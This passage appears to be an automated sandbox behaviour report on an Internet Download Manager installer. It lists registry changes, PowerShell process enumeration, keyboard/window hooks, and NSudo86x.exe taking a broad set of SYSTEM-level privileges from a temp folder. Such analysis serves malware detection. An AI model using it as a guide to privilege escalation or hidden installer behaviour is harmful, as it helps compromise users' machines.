Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E0DACC63-037F-46EE-AC02-E4C7B0FBFEB4}\Policy = "3" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{C950922F-897A-4E13-BA38-66C8AF2E0BF7}\ = "IIDMEFSAgent7" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{436D67E1-2FB3-4A6C-B3CD-FF8A41B0664D}\TypeLib\ = "{3BDFC55C-ED33-43BB-9A77-57C2AF4B56EF}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{33AEF752-FB86-4787-9ED1-6010528F5FA3}\TypeLib C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\IDMIECC.IDMHelperLinksStorage\ = "IDMHelperLinksStorage Class" C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0F947660-8606-420A-BAC6-51B84DD22A47}\TypeLib C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\IDMIECC.IDMIEHlprObj.1\ = "IDMIEHlprObj Class" C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{436D67E1-2FB3-4A6C-B3CD-FF8A41B0664D}\Programmable C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDD67718-A430-4AB9-A939-83D9074B0038}\TypeLib C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6B9EB066-DA1F-4C0A-AC62-01AC892EF175} C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0055C089-8582-441B-A0BF-17B458C2A3A8}\Implemented Categories\{59FB2056-D625-48D0-A944-1A85B5AB2640} C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CDD67718-A430-4AB9-A939-83D9074B0038} C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{436D67E1-2FB3-4A6C-B3CD-FF8A41B0664D}\Programmable C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6EDC7F8E-EB3D-4F9A-B693-216F07C94D74}\TypeLib\ = "{5518B636-6884-48CA-A9A7-1CFD3F3BA916}" C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0055C089-8582-441B-A0BF-17B458C2A3A8}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{436D67E1-2FB3-4A6C-B3CD-FF8A41B0664D} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{52F6F7BD-DF73-44B3-AE13-89E1E1FB8F6A}\ProgID C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5312C54E-A385-46B7-B200-ABAF81B03935}\Programmable C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0055C089-8582-441B-A0BF-17B458C2A3A8}\TypeLib\ = "{3BDFC55C-ED33-43BB-9A77-57C2AF4B56EF}" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0F947660-8606-420A-BAC6-51B84DD22A47}\ProgID C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0F947660-8606-420A-BAC6-51B84DD22A47}\Elevation C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{52F6F7BD-DF73-44B3-AE13-89E1E1FB8F6A}\Control C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{6A89524B-E1B6-4D71-972A-8FD53F240936}\1.0\0\win32 C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5312C54E-A385-46B7-B200-ABAF81B03935}\VersionIndependentProgID C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{52F6F7BD-DF73-44B3-AE13-89E1E1FB8F6A}\Version C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DownlWithIDM.V2LinkProcessor\ = "V2LinkProcessor Class" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0F947660-8606-420A-BAC6-51B84DD22A47}\VersionIndependentProgID C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0055C089-8582-441B-A0BF-17B458C2A3A8} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\IDMGetAll.IDMAllLinksProcessor\CLSID\ = "{5312C54E-A385-46B7-B200-ABAF81B03935}" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\IDMGetAll.IDMAllLinksProcessor.1\ = "IDMAllLinksProcessor Class" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DownlWithIDM.LinkProcessor\CLSID\ = "{52F6F7BD-DF73-44B3-AE13-89E1E1FB8F6A}" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{52F6F7BD-DF73-44B3-AE13-89E1E1FB8F6A}\ToolboxBitmap32\ = "C:\\Program Files (x86)\\Internet Download Manager\\downlWithIDM64.dll, 101" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DownlWithIDM.IDMDwnlMgr.1\CLSID\ = "{7D11E719-FF90-479C-B0D7-96EB43EE55D7}" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{C7798BD6-34AF-4925-B01C-450C9EAD2DD9}\TypeLib\ = "{3BDFC55C-ED33-43BB-9A77-57C2AF4B56EF}" C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6B9EB066-DA1F-4C0A-AC62-01AC892EF175}\ = "IIDMEFSAgent2" C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Wow6432Node\CLSID\{48f2566e-08f2-125c-c7f2-dd3a0bdb43b7}\Version\ = "44774" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4764030F-2733-45B9-AE62-3D1F4F6F2861}\ProgID\ = "DownlWithIDM.V2LinkProcessor.1" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\IDMGetAll.IDMAllLinksProcessor\CurVer C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0F947660-8606-420A-BAC6-51B84DD22A47} C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CDD67718-A430-4AB9-A939-83D9074B0038} C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7D11E719-FF90-479C-B0D7-96EB43EE55D7}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{52F6F7BD-DF73-44B3-AE13-89E1E1FB8F6A}\MiscStatus C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{28670AE0-CAF4-4836-8418-0F456023EBF7}\NumMethods\ = "15" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5312C54E-A385-46B7-B200-ABAF81B03935}\ProgID\ = "IDMGetAll.IDMAllLinksProcessor.1" C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{52F6F7BD-DF73-44B3-AE13-89E1E1FB8F6A}\Insertable C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0F947660-8606-420A-BAC6-51B84DD22A47}\Programmable C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7D11E719-FF90-479C-B0D7-96EB43EE55D7}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\downlWithIDM64.dll" C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CDD67718-A430-4AB9-A939-83D9074B0038}\VersionIndependentProgID C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{436D67E1-2FB3-4A6C-B3CD-FF8A41B0664D}\Programmable C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4764030F-2733-45B9-AE62-3D1F4F6F2861}\Programmable C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{52F6F7BD-DF73-44B3-AE13-89E1E1FB8F6A}\ProgID C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{436D67E1-2FB3-4A6C-B3CD-FF8A41B0664D}\TypeLib C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\IDMIECC.IDMHelperLinksStorage\CLSID\ = "{436D67E1-2FB3-4A6C-B3CD-FF8A41B0664D}" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{436D67E1-2FB3-4A6C-B3CD-FF8A41B0664D}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\IDMIECC64.dll" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5518B636-6884-48CA-A9A7-1CFD3F3BA916}\1.0\0 C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0055C089-8582-441B-A0BF-17B458C2A3A8}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{52F6F7BD-DF73-44B3-AE13-89E1E1FB8F6A} C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\IDMIECC.IDMHelperLinksStorage\CLSID\ = "{436D67E1-2FB3-4A6C-B3CD-FF8A41B0664D}" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\IDMGetAll.IDMAllLinksProcessor.1\CLSID\ = "{5312C54E-A385-46B7-B200-ABAF81B03935}" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{AC746233-E9D3-49CD-862F-068F7B7CCCA4}\ = "IDMan.CIDMLinkTransmitter" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{33AEF752-FB86-4787-9ED1-6010528F5FA3}\ = "IIDMAllLinksProcessor" C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4764030F-2733-45B9-AE62-3D1F4F6F2861}\VersionIndependentProgID\ = "DownlWithIDM.V2LinkProcessor" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{13D4E387-BAB7-47E7-B3D7-3F01ABC463EA} C:\Program Files (x86)\Internet Download Manager\idmBroker.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{C950922F-897A-4E13-BA38-66C8AF2E0BF7} C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\PING.EXE N/A
N/A N/A C:\Windows\System32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 16603999968952340 N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
